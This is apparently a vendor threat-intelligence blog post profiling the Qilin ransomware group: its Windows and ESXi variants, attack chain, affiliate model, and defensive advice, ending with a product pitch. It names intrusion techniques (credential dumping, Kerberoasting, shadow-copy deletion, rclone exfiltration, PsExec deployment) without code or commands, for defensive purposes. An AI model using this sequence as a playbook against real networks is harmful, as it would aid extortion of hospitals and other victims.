The Rise of Qilin
Qilin — also tracked as Agenda — emerged in late 2022 and has steadily climbed the ranks of active ransomware operations. By early 2025, Qilin consistently appeared in the top ten most prolific ransomware groups by victim count, with a particular appetite for healthcare organizations, manufacturing firms, and government entities.
Unlike many RaaS operations that rely on volume and opportunism, Qilin demonstrates a level of targeting discipline that suggests experienced operators. They select victims deliberately, perform extensive reconnaissance before deploying ransomware, and calibrate ransom demands based on the victim's perceived ability to pay.
Technical Architecture
Qilin ransomware is cross-platform by design. The group maintains both Windows and Linux variants, with the Linux version specifically targeting VMware ESXi hypervisors — a choice that reflects the growing importance of virtualization infrastructure in enterprise environments.
Windows Variant
The Windows payload is written in Rust, a language choice increasingly popular among ransomware developers for its memory safety guarantees and difficulty of reverse engineering. The binary supports configurable encryption parameters:
- File encryption uses Chacha20 with RSA-4096 key encapsulation
- Operators can configure which file extensions to target or skip
- Volume shadow copies are deleted using
vssadminandwmic - The ransomware can propagate across SMB shares when configured to do so
Linux/ESXi Variant
The Linux variant targets ESXi environments specifically. It enumerates running virtual machines, terminates them to release file locks, then encrypts the underlying VMDK files. This approach maximizes impact because a single ESXi host often runs dozens of production virtual machines.
The encryption of VM disk files is particularly devastating because it bypasses any security controls running inside the guest operating systems. The VMs do not need to be compromised individually — the hypervisor-level attack renders them all inaccessible simultaneously.
Attack Chain Analysis
Qilin's typical attack progression follows a well-established pattern with some distinctive characteristics:
Initial Access
Qilin affiliates primarily gain access through compromised VPN credentials and exploited public-facing applications. In 2024, they were observed exploiting vulnerabilities in Citrix NetScaler, Fortinet FortiGate, and Ivanti Connect Secure appliances — often within days of public disclosure.
They also leverage initial access brokers (IABs) who sell pre-established footholds into corporate networks. This division of labor allows Qilin operators to focus on post-exploitation rather than the noisy work of initial compromise.
Reconnaissance and Lateral Movement
Once inside, Qilin operators spend considerable time mapping the environment. They use standard tools — nltest, net group, adfind — to enumerate Active Directory structure, identify domain controllers, and locate high-value targets like file servers and database systems.
Lateral movement typically leverages compromised domain administrator credentials obtained through Mimikatz, LSASS dumping, or Kerberoasting attacks. The operators show patience, sometimes maintaining access for weeks before deploying ransomware.
Data Exfiltration
Before encryption, Qilin exfiltrates significant volumes of data. They favor tools like rclone configured to upload to Mega.nz or other cloud storage providers. The exfiltrated data serves as leverage in their double extortion model and is eventually published on their Tor-based leak site if the victim does not pay.
Deployment
Ransomware deployment is typically coordinated to occur outside business hours. The operators use Group Policy Objects (GPOs) or PsExec to distribute the payload across the network simultaneously, maximizing the blast radius before anyone can respond.
Victim Selection and Impact
Qilin's targeting of healthcare organizations is particularly concerning. Hospitals and health systems face unique pressure to pay ransoms because downtime directly impacts patient care. The group appears to understand this leverage and has repeatedly targeted healthcare entities despite the ethical implications.
Manufacturing firms represent another favored target. Production downtime costs these organizations significant revenue per hour, creating urgency to restore operations — which often means paying the ransom.
Government entities, educational institutions, and professional services firms round out Qilin's victim portfolio. The group generally avoids targets in Commonwealth of Independent States (CIS) countries, suggesting operators or leadership based in or aligned with that region.
Ransomware-as-a-Service Model
Qilin operates a RaaS program with a relatively generous affiliate split — reports suggest affiliates retain 80-85% of ransom payments, with the core group taking the remainder. This competitive commission structure helps attract skilled affiliates from other ransomware operations.
The group provides affiliates with:
- A builder that generates customized payloads for each target
- A management panel for tracking victims and negotiations
- A dedicated leak site for publishing stolen data
- Technical support for deployment and troubleshooting
Defensive Strategies
Protecting against Qilin requires addressing their primary attack vectors:
Patch public-facing appliances immediately. Qilin affiliates exploit known vulnerabilities rapidly. VPN concentrators, firewalls, and remote access gateways need priority patching.
Implement MFA everywhere. Stolen credentials are the most common initial access vector. Multi-factor authentication on VPN, email, and administrative interfaces eliminates the easiest path in.
Secure ESXi infrastructure. If you run VMware environments, ensure ESXi hosts are patched, management interfaces are not exposed to the network, and you have offline backups of critical VM configurations.
Monitor for lateral movement indicators. Large-scale use of PsExec, unusual LDAP queries, and Kerberoasting attempts should trigger immediate investigation.
Segment and protect backups. Offline or immutable backups are the single most important recovery control. Qilin operators specifically hunt for and destroy accessible backup infrastructure.
How Safeguard.sh Helps
Qilin's exploitation of known vulnerabilities in public-facing appliances underscores the need for comprehensive vulnerability visibility. Safeguard continuously monitors your software components and dependencies, flagging known vulnerabilities before attackers can exploit them. By maintaining a real-time SBOM, Safeguard ensures you know exactly which systems run affected software when a new CVE drops — whether it is a Citrix appliance, a VMware component, or an open source library. This speed of identification is the difference between patching before Qilin arrives and discovering the exposure during incident response.